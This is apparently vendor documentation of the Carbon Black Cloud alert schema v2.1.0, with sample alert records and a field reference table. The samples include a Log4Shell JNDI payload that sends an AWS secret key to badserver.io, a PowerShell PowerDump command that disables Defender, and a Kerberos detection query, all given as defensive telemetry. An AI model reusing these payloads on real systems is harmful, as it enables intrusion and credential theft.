Alert Schema 2.1.0
Introduction
The following tables list the fields that can be included in an alert record for each alert type generated by the Carbon Black Cloud.
This Data Forwarder Schema (v2.1.0) is aligned with the Alerts v7 API schema.
Fields in the Schema section are included with most alert types and the exceptions are annotated.
Alert types that are emitted from the Data Forwarder are dependent on the features you have enabled in Carbon Black Cloud. Possible Alert types are:
- CB_ANALYTICS - created from the Endpoint Standard NGAV offering.
- CONTAINER_RUNTIME - created from the Container Security offering. Deprecated as of May 2025. For more info here.
- DEVICE_CONTROL - created when an endpoint attempts to access a blocked USB device.
- HOST_BASED_FIREWALL - created from network detections in the Endpoint Standard Host-Based Firewall add-on.
- INTRUSION_DETECTION_SYSTEM - created by the XDR extension to Enterprise EDR.
- WATCHLIST - created from alert enabled watchlists in Enterprise EDR.
Alert Type Examples
{
"org_key":"ABCD1234",
"alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:ca316d99-a808-3779-8aab-62b2b6d9541c&orgKey=ABCD1234",
"id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
"type":"INTRUSION_DETECTION_SYSTEM",
"backend_timestamp":"2023-02-03T17:27:33.007Z",
"backend_update_timestamp":"2023-02-03T17:27:33.007Z",
"detection_timestamp":"2023-02-03T17:22:03.945Z",
"first_event_timestamp":"2023-02-03T17:22:03.945Z",
"last_event_timestamp":"2023-02-03T17:22:03.945Z",
"severity":1,
"reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit",
"reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
"primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow": {
"change_timestamp":"2023-02-03T17:27:33.007Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON",
"status":"OPEN"
},
"determination":{"change_timestamp":"2023-02-03T17:27:33.007Z",
"value":"NONE",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION"},
"alert_notes_present":false,
"is_updated":false,
"rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
"rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"device_id":17482451,
"device_name":"DEV01-39X-1",
"device_uem_id":"",
"device_target_value":"MEDIUM",
"device_policy":"Standard",
"device_policy_id":165700,
"device_os":"WINDOWS",
"device_os_version":"Windows 10 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"66.170.99.2",
"device_internal_ip":"10.203.105.21",
"mdr_alert":false,
"mdr_alert_notes_present":false,
"ttps":[],
"attack_tactic":"TA0001",
"attack_technique":"T1190",
"process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
"process_pid":5780,
"process_name":"c:\\windows\\system32\\curl.exe",
"process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
"process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
"process_username":"DEV01-39X-1\\bit9qa",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
"parent_pid":8796,
"parent_name":"c:\\windows\\system32\\cmd.exe",
"parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
"parent_username":"DEV01-39X-1\\bit9qa",
"childproc_guid":"",
"childproc_username":"",
"childproc_cmdline":"",
"netconn_remote_port":80,
"netconn_local_port":49233,
"netconn_protocol":"",
"netconn_remote_domain":"google.com",
"netconn_remote_ip":"142.250.189.174",
"netconn_local_ip":"10.203.105.21",
"netconn_remote_ipv4":"142.250.189.174",
"netconn_local_ipv4":"10.203.105.21",
"tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
"threat_name":"CVE-2021-44228 Exploit",
"version":"2.1.0"
}
{
"org_key":"ABCD1234",
"alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f",
"id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
"type":"CONTAINER_RUNTIME",
"is_updated":false,
"detection_timestamp":"2023-02-06T00:10:51.176Z",
"first_event_timestamp":"2023-02-06T00:09:19.320Z",
"last_event_timestamp":"2023-02-06T00:09:19.320Z",
"severity":5,
"reason":"Detected a connection to a public destination that isn't allowed for this scope",
"threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
"primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-02-06T00:13:37.663Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
"sensor_action":"ALLOW",
"device_target_value":"MEDIUM",
"device_os":"WINDOWS",
"device_location":"UNKNOWN",
"k8s_policy_id":"ef4ccd0b-df14-4f5d-8454-480c5193a0b7",
"k8s_policy":"Big runtime policy",
"k8s_rule_id":"11111111-1111-1111-1111-111111111111",
"k8s_rule":"Allowed public destinations",
"k8s_cluster":"tomer:sensor-aks",
"k8s_namespace":"kube-system",
"k8s_kind":"DaemonSet",
"k8s_workload_name":"ama-logs",
"k8s_pod_name":"ama-logs-gm5tt",
"connection_type":"EGRESS",
"ip_reputation":96,
"netconn_remote_port":443,
"netconn_local_port":56618,
"netconn_protocol":"TCP",
"netconn_remote_domain":"westeurope.monitoring.azure.com",
"netconn_remote_ip":"20.50.65.82",
"netconn_local_ip":"10.244.2.22",
"netconn_remote_ipv4":"20.50.65.82",
"netconn_local_ipv4":"10.244.2.22",
"remote_is_private":false,
"process_guid":"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33",
"process_pid":2100834,
"process_name":"KUBERNETES_RUNTIME_NODE_AGENT",
"process_sha256":"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5",
"process_md5":"4cbdc5f51d0397b26886191b799131d5",
"process_reputation":"NOT_LISTED",
"process_effective_reputation":"RESOLVING",
"mdr_alert_notes_present":false,
"mdr_alert":false,
"version":"2.1.0"
}
{
"org_key":"ABCD1234",
"alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
"id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
"type":"WATCHLIST",
"is_updated":false,
"detection_timestamp":"2023-07-17T17:21:13.483Z",
"backend_timestamp":"2023-07-17T17:21:34.063Z",
"backend_update_timestamp":"2023-07-17T17:21:34.063Z",
"first_event_timestamp":"2023-07-17T17:19:00.412Z",
"last_event_timestamp":"2023-07-17T17:19:00.412Z",
"severity":10,
"reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
"threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
"primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-07-17T17:21:34.063Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"determination":{
"value":"NONE",
"change_timestamp":"2023-07-17T17:21:34.063Z"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
"sensor_action":"ALLOW",
"device_target_value":"MEDIUM",
"device_policy_id":6525,
"device_policy":"default",
"device_id":5890528,
"device_name":"ABT102675",
"device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
"device_os":"WINDOWS",
"device_os_version":"Windows 11 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"49.206.61.4",
"device_internal_ip":"192.168.0.104",
"report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
"report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
"report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
"report_tags":[
"credentialaccess",
"t1558",
"windows",
"amsi",
"attack",
"attackframework"
],
"report_link":"https://attack.mitre.org/techniques/T1558/003/",
"ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
"ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
"watchlists":[{
"id":"Ci7w5B4URg6HN60hatQMQ",
"name":"AMSI Threat Intelligence"
}],
"process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
"process_pid":13636,
"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
"process_md5":"0499440c4b0783266183246e384c6657",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
"process_username":"NT AUTHORITY\\SYSTEM",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
"parent_pid":10384,
"parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
"parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
"parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
"parent_reputation":"NOT_LISTED",
"parent_effective_reputation":"NOT_LISTED",
"parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
"parent_username":"NT AUTHORITY\\SYSTEM",
"mdr_alert_notes_present":false,
"mdr_alert":false,
"ml_classification_final_verdict":"ANOMALOUS",
"ml_classification_global_prevalence":"MEDIUM",
"ml_classification_org_prevalence":"LOW",
"version":"2.1.0"
}
{
"org_key":"ABCD1234",
"alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
"id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
"type":"CB_ANALYTICS",
"is_updated":true,
"detection_timestamp":"2023-07-17T17:15:51.708Z",
"backend_timestamp":"2023-07-17T17:16:50.960Z",
"backend_update_timestamp":"2023-07-17T17:18:03.397Z",
"first_event_timestamp":"2023-07-17T17:15:33.396Z",
"last_event_timestamp":"2023-07-17T17:15:33.396Z",
"severity":5,
"reason":"A known virus (HackTool: Powerpuff) was detected running.",
"threat_id":"9e0afc389c1acc43b382b1ba590498d2",
"primary_event_id":"94953e4524c511ee86284f0541a5184d",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-07-17T17:16:50.960Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"determination":{
"value":"NONE",
"change_timestamp":"2023-07-17T17:16:50.960Z"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"T_REP_VIRUS",
"sensor_action":"ALLOW",
"device_target_value":"MISSION_CRITICAL",
"device_policy_id":112221,
"device_policy":"SSQ_Policy",
"device_id":6948863,
"device_name":"Kognos-W19-CB-3",
"device_os":"WINDOWS",
"device_os_version":"Windows Server 2019 x64",
"device_username":"demouser@demo.org",
"device_location":"OFFSITE",
"device_external_ip":"34.234.170.45",
"device_internal_ip":"10.0.14.120",
"ttps":[
"FILELESS",
"MALWARE_APP",
"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
"MITRE_T1059_001_POWERSHELL",
"RUN_MALWARE_APP"
],
"attack_tactic":"TA0002",
"process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
"process_pid":3600,
"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
"process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
"process_md5":"42a80cc2333b612b63a859f17474c9af",
"process_reputation":"KNOWN_MALWARE",
"process_effective_reputation":"KNOWN_MALWARE",
"process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
"process_username":"KOGNOS-W19-CB-3\\Administrator",
"parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
"parent_pid":4024,
"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_username":"KOGNOS-W19-CB-3\\Administrator",
"childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
"childproc_effective_reputation":"RESOLVING",
"childproc_username":"KOGNOS-W19-CB-3\\Administrator",
"blocked_effective_reputation":"RESOLVING",
"mdr_alert_notes_present":false,
"mdr_alert":false,
"version":"2.1.0",
}
{
"org_key": "ABCD1234",
"alert_url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:94992bd4-b072-3158-aa7b-36bea9f54e15&orgKey=ABCD1234",
"id": "94992bd4-b072-3158-aa7b-36bea9f54e15",
"type": "HOST_BASED_FIREWALL",
"backend_timestamp": "2025-04-02T08:08:43.716Z",
"backend_update_timestamp": "2025-04-02T08:08:43.716Z",
"detection_timestamp": "2025-04-02T08:07:18.070Z",
"first_event_timestamp": "2025-04-02T08:07:18.070Z",
"last_event_timestamp": "2025-04-02T08:07:18.070Z",
"severity": 4,
"reason": "Inbound UDP connection blocked by firewall rule group block ftp",
"reason_code": "DD71F364-4A8C-4B14-89F6-7041CC6BEDEA:CE7A4C0E-0F7D-449B-B816-615C66AEB91D",
"threat_id": "353f695cedb2ce00703618f9af2454412f09ed88163fd645a72bcf4f0d1eac05",
"primary_event_id": "9aN-VbSURHe63RCttnuTYw-0",
"policy_applied": "APPLIED",
"run_state": "DID_NOT_RUN",
"sensor_action": "DENY",
"workflow": {
"change_timestamp": "2025-04-02T08:08:43.716Z",
"changed_by_type": "SYSTEM",
"changed_by": "ALERT_CREATION",
"closure_reason": "NO_REASON",
"status": "OPEN"
},
"determination": {
"change_timestamp": "2025-04-02T08:08:43.716Z",
"value": "NONE",
"changed_by_type": "SYSTEM",
"changed_by": "ALERT_CREATION"
},
"alert_notes_present": false,
"alert_origin": "ALERT_ORIGIN_UNKNOWN",
"is_updated": false,
"rule_category_id": "DD71F364-4A8C-4B14-89F6-7041CC6BEDEA",
"rule_id": "CE7A4C0E-0F7D-449B-B816-615C66AEB91D",
"device_id": 18118170,
"device_name": "device-name.3663511-23",
"device_target_value": "MEDIUM",
"device_policy": "Raz-test",
"device_policy_id": 20314731,
"device_os": "WINDOWS",
"device_os_version": "Windows 10 x64 SP: 1",
"device_username": "device-name.3663511-23@carbonblack.com",
"device_location": "UNKNOWN",
"device_external_ip": "34.145.18.128",
"mdr_alert": false,
"mdr_alert_notes_present": false,
"process_guid": "ABCD1234-0114761a-001a8553-00000000-1dba3a640911966",
"process_pid": 1738067,
"process_name": "SYSTEM",
"process_sha256": "644d15ea6a0cb7ac2014c15187306ebf790e936c86a94dd87754e2a9622c64a7",
"process_md5": "3dcc07415880c8378edcc9c799df99da",
"process_effective_reputation": "LOCAL_WHITE",
"process_reputation": "NOT_LISTED",
"process_username": "NT AUTHORITY\\SYSTEM",
"netconn_remote_port": 138,
"netconn_local_port": 138,
"netconn_remote_ip": "10.203.109.77",
"netconn_local_ip": "10.203.111.255",
"netconn_remote_ipv4": "10.203.109.77",
"netconn_local_ipv4": "10.203.111.255",
"version": "2.1.0"
}
{
"org_key": "ABCD1234",
"alert_url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:a90debb9-788b-4268-8926-1412c45bae19&orgKey=ABCD1234",
"id": "a90debb9-788b-4268-8926-1412c45bae19",
"type": "DEVICE_CONTROL",
"backend_timestamp": "2025-04-02T08:08:24.157Z",
"backend_update_timestamp": "2025-04-02T08:08:24.157Z",
"detection_timestamp": "2025-04-02T08:07:18.188Z",
"first_event_timestamp": "2025-04-02T08:07:18.188Z",
"last_event_timestamp": "2025-04-02T08:07:18.188Z",
"severity": 3,
"reason": "Access attempted on unapproved USB device Lexar USB Flash Drive USB Device (SN: I891EGANR1ZYKDID). A Deny Policy Action was applied.",
"reason_code": "6D578342-9DE5-4353-9C25-1D3D857BFC5B:DCAEB1FA-513C-4026-9AB6-37A935873FBC",
"threat_id": "111546d4945db64c849f3aac5b4b62740f7c4d8f537fcd85cafd3b53c8e4d3ea",
"primary_event_id": "5b9dkxhuQ0anNHtDea77Sg-0",
"policy_applied": "APPLIED",
"run_state": "DID_NOT_RUN",
"sensor_action": "DENY",
"workflow": {
"change_timestamp": "2025-04-02T08:08:24.157Z",
"changed_by_type": "SYSTEM",
"changed_by": "ALERT_CREATION",
"closure_reason": "NO_REASON",
"status": "OPEN"
},
"determination": {
"change_timestamp": "2025-04-02T08:08:24.157Z",
"value": "NONE",
"changed_by_type": "SYSTEM",
"changed_by": "ALERT_CREATION"
},
"alert_notes_present": false,
"alert_origin": "ALERT_ORIGIN_UNKNOWN",
"is_updated": false,
"device_id": 18118172,
"device_name": "device-name-1677785023.154724-39",
"device_target_value": "MEDIUM",
"device_policy": "Raz-test",
"device_policy_id": 20314731,
"device_os": "WINDOWS",
"device_os_version": "Windows 10 x64 SP: 1",
"device_username": "device-name-1677785023.154724-39@carbonblack.com",
"device_location": "UNKNOWN",
"device_external_ip": "34.145.18.128",
"mdr_alert": false,
"mdr_alert_notes_present": false,
"vendor_name": "Lexar",
"vendor_id": "0x05DC",
"product_name": "USB Flash Drive",
"product_id": "0x56A2D",
"external_device_friendly_name": "Lexar USB Flash Drive USB Device",
"serial_number": "I891EGANR1ZYKDID",
"version": "2.1.0"
}
New fields
New fields introduced since the previous schema version are denoted with a tangerine bar
v2.1.0
at the left of the table row. You can easily isolate these by typing 2.1.0 in the Field Name filter box.
Data Types
Find more detail on the data types here.
Schema
Note: Certain fields that were previously included in this listing, but which never have and never will appear in Data Forwarder output, have been removed.| Field Name | Definition | Datatype | Alert Types Supported |
|---|---|---|---|
alert_notes_present |
True if notes are present on the alert ID. False if notes are not present. | Boolean | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
V2.1.0
alert_origin |
How the alert was created.
Possible values: MDR
MDR_THREAT_HUNT |
String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
alert_url |
Link to the alerts page for this alert. Does not vary by alert type | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
attack_tactic |
A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access | String | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM |
attack_technique |
A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access | String | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM |
backend_timestamp |
Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page. | ISO 8601 UTC timestamp | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
backend_update_timestamp |
Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page.
Note that changes made by users do not change this date; those changes are reflected on user_update_timestamp |
ISO 8601 UTC timestamp | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_effective_reputation |
Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred
Possible values: ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_md5 |
MD5 hash of the child process binary; for any process terminated by the sensor | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_name |
Tokenized file path of the files blocked by sensor action | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_sha256 |
SHA-256 hash of the child process binary; for any process terminated by the sensor | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_cmdline |
Command line for the child process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_effective_reputation |
Effective reputation of the child process; applied by the sensor at the time the event occurred
Possible values: ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED |
String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_guid |
Unique process identifier assigned to the child process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_md5 |
Hash of the child process' binary (Enterprise EDR) | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_name |
Filesystem path of the child process' binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_sha256 |
Hash of the child process' binary (Endpoint Standard) | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_username |
User context in which the child process was executed | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
connection_type
DEPRECATED |
Connection Type
INTERNAL_INBOUND
INTERNAL_OUTBOUND
INGRESS
EGRESS |
String | CONTAINER_RUNTIME |
detection_timestamp |
Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert. | ISO 8601 UTC timestamp | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination |
User-updatable determination of the alert
|
Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_external_ip |
IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_id |
ID of devices | Integer | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_internal_ip |
IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_location |
Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix
Possible values: ONSITE
OFFSITE
UNKNOWN |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_name |
Device name | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_os |
Device Operating Systems
WINDOWS
MAC
LINUX
OTHER |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_os_version |
The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later. | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_policy |
Device policy | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_policy_id |
Device policy id | Integer | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_target_value |
Target value assigned to the device, set from the policy
LOW
MEDIUM
HIGH
MISSION_CRITICAL |
String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_uem_id |
Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_username |
Users or device owners of alerts | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
egress_group_id
DEPRECATED |
Unique identifier for the egress group | String | CONTAINER_RUNTIME |
egress_group_name
DEPRECATED |
Name of the egress group | String | CONTAINER_RUNTIME |
external_device_friendly_name |
Human-readable external device names | String | DEVICE_CONTROL |
first_event_timestamp |
Timestamp when the first event in the alert occurred | ISO 8601 UTC timestamp | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
id |
Unique ID of alert | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
ioc_field |
The field the indicator of comprise (IOC) hit contains | String | WATCHLIST |
ioc_hit |
IOC field value or IOC query that matches | String | WATCHLIST |
ioc_id |
Unique identifier of the IOC that generated the watchlist hit | String | WATCHLIST |
ip_reputation
DEPRECATED |
Range of reputations to accept for the remote IP:
0: unknown 1-20: high risk 21-40: suspicious 41-60: moderate 61-80: low risk 81-100: trustworthy There must be two values in this list. The first is the lower end of the range (inclusive) the second is the upper end of the range (inclusive) |
Integer | CONTAINER_RUNTIME |
is_updated |
Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, will generate a new copy of the alert, but is_updated will be set to false. |
Boolean | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
k8s_cluster
DEPRECATED |
K8s Cluster name | String | CONTAINER_RUNTIME |
k8s_kind
DEPRECATED |
K8s Workload kind | String | CONTAINER_RUNTIME |
k8s_namespace
DEPRECATED |
K8s namespace | String | CONTAINER_RUNTIME |
k8s_pod_name
DEPRECATED |
Name of the pod within a workload | String | CONTAINER_RUNTIME |
k8s_policy
DEPRECATED |
